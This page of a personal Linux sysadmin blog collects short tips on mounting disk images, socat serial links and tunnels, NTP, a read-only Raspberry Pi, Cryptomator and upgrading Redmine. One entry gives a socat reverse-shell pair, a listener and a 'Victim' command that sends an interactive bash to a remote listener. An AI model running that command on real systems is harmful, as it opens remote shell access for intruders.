oriolrius.cat

Des del 2000 compartiendo sobre…

Category: System administration, Databases, Messaging and Security

Linux: Mounting file as a partition

2018/03/21 No Comments

Reading time: 1 – 2 minutes

When we have a file with a ‘dd’ of a full disk and we want to mount a partition of that disk, we have to use an offset for jumping to the beginning of the partition that we want to mount.
Using ‘fdisk’ command we can find the partitions of that disk copied inside a file.

fdisk -l FILE_WITH_DISK_INSIDE

Once partition table is shown there is a column called ‘Start’ using the corresponding number in this column for the partition that we want we can obtain the offset required for our mounting point. Reasoning behind that is multiply start sector per number of bytes per sector.

# OFFSET = START * 512
mount -o ro,loop,offset=OFFSET FILE_WITH_DISK_INSIDE /mnt

I hope thanks to this technical note next time that I forget how to get the offset I find it fastly.

UPDATE 2018/08/29:

If you don’t want to do that manually, there is a small tool called losetup which maps the partitions of a disk image on a file.


# example, attaching partitions to loopback devices
losetup -P /dev/loop0 DISK_IMAGE
# just mount the devices now, they are /dev/loop0pX where X is the number of the partition
# dettach this assignament:
losetup -d /dev/loop0

socat tip: create virtual serial port and link it to TCP

2018/03/07 No Comments
Reading time: 5 – 8 minutes

Create a virtual serial port and publish it on TCP port:

socat pty,link=/dev/virtualcom0,rawer tcp-listen:2101

In another computer, for instance, another virtual port can be created and connected to the previous one:

socat pty,link=/dev/virtualcom0,rawer tcp:SERVER_IP:2101

If in any of those both sides we want to open a real serial port, for instance, in the server case we can run:

socat /dev/ttyS0,rawer tcp-listen:2101

More information on socat manpage.

Ubuntu synchronize NTP clock

2018/02/04 No Comments
Reading time: 2 – 4 minutes

Synchronise Linux clock when NTP service is running but the clock is not on time:

sudo service ntp stop
sudo ntpd -gq
sudo service ntp start

socat tip: VPN without cyphering

2018/01/30 No Comments
Reading time: 3 – 4 minutes

Fast reminder and tip for socat, it can work on two devices or more:

# SERVER:
socat TCP-LISTEN:4443 TUN:192.168.255.2/24,up

# CLIENT:
socat TCP:SERVER_IP:4443 TUN:192.168.255.1/24,up

ngrok – service which solve services behind NAT issues

2018/01/24 2 Comments

Reading time: < 1 minute This is another short entry, in this case for recommending a service which we solve typical problem solved using a DNAT. Once we have a service on our laptop, or on a private server and we have to expose that service on the internet for some time or permanently usually we have to go the firewall, or router and create a NAT rule forwarding a port. This is a simple and powerful service which is going to solve that for you. There is a free account for understanding and testing the service, other plans are available and especially affordable for professional requirements.

ngrock.com

I was frogetting to say it’s compatible with Linux, Windows and Mac.

socat reminder: reverse shell

2018/01/22 No Comments
Reading time: 3 – 4 minutes 
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:12345

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:IP_LISTENER:12345

Raspberry PI: using read-only root partition

2017/08/30 No Comments
Reading time: 6 – 10 minutes

Two years ago I wrote an article discussing how to set up OpenWRT filesystem configuration for controlling writes in the flash card: Raspberry PI and OpenWRT flash partition proposal and rescue boot support for embedded systems.

This current article is mainly for referencing a very good article about how to work with Raspbian with a read-only filesystem and share a fast and dirty cookbook about how to play with that. First of all the reference to: Protect your Raspberry PI SD card, use Read-Only filesystem.

My cookbook about how to get the essence of that article is simple, locate in your /etc/fstab file the line:

/dev/mmcblk0p2  /               ext4    defaults,noatime  0       1

and modify that line with:

/dev/mmcblk0p2  /               ext4    defaults,noatime,ro  0       1

After rebooting your system is going to work in read-only mode. I don’t remember if I modified anything else of the booting process but I don’t thing so.
Because sometimes I have to modify anything in the flash card, I added the next two lines in the ~/.bashrc file:

alias rw='sudo mount -o remount,rw / ; sudo mount -o remount,rw /boot'
alias ro='sudo mount -o remount,ro / ; sudo mount -o remount,ro /boot'

Now just with the command rw it’s really easy to get the root filesystem in the write mode, and when I finish my updates just typing ro it’s go back to read-only mode.

I hope it’s useful for you.

Cryptomator: create a secure vault for your files

2017/08/22 No Comments

Reading time: 2 – 2 minutes

Yesterday I found a tool called Cryptomator, this is a client-side encryption for your files. You can use it with Dropbox, or any other cloud filesystem or you can use it in your local filesystem. Anyway, this open-source piece of software is really simple to install and is compatible with Windows, Mac and Linux. Once this is installed, using the UI the only thing we have to do is create, or select, a folder where the secure vault is going to be created. It uses a symmetric password for cyphering and when the vault is unlocked a new removable drive appear in your system. So, at the end, the vault is like a pendrive and there is no complexity on add, rename, remove, create folders, etc. inside the new drive. Once the vault is locked, the removable drive is unmounted and if you go to the location where the vault is created a tree structure with cyphered files is the only thing that you can see. Cryptomator works cyphering each file, not the complete vault as a package.

So far I installed the tool on my Windows computer for securing some sensitive files that I have on my laptop. But if it works like I expect I’m going to extend the usage with the rest of my computers. As I said it’s not required any cloud filesystem, by the way, I use Cryptomator in conjunction with Resilio Sync.

Spark Post: Mail relay host for mailings

2017/05/05 No Comments

Reading time: 1 – 2 minutes

This is going to be a very short post entry, I just want to refer a very interesting mail relay (smart host) which define itself like:

Email delivery services built for developers, by developers
Combined with your language of choice, using the power of our robust cloud API couldn’t be easier.

Open a SparkPost account today and send up to 100.000 emails per month for free. The best is you can do using SMTP or using a REST API; really nice easy to use an powerful control dashboard simplify externally keys management, statistics, templates for mailings, and many more features.

Personally I love the service because is extremely useful to be configured on SSMTP service of Linux as a default relay host, for personal and professional use. Another use could be to check end-to-end mail services.

Personally I love the service, and if you want to send really big mailings theirs costs are very competitive. 

Upgrading Redmine in a nutshell

2017/04/28 No Comments
Reading time: 14 – 23 minutes

I use Redmine to track my personal projects, and every time that I have to update I have to re-read the full upgrading page which is long and full of exceptions. So I decided to write my own reduced cookbook to solve that. FYI I’m using Ubuntu 16.04, Apache2, MySQL and Passenger for running Redmine. 

Being root user run:

backup MySQL database

download new redmine package and unpack in /var/www

change ‘redmine’ soft link to new folder

copy old files and directories overwriting the new ones:<br><pre><code>config/database.yml<br>config/configuration.yml<br>files/<br>plugins/</code></pre><br>
locating work directory on new redmine folder, run:<br><pre>bundle install --without development test<br>bundle exec rake generate_secret_token<br>bundle exec rake db:migrate RAILS_ENV=production<br>bundle exec rake redmine:plugins:migrate RAILS_ENV=production<br>bundle exec rake tmp:cache:clear tmp:sessions:clear RAILS_ENV=production</pre><br>

restart apache server

Scroll to Top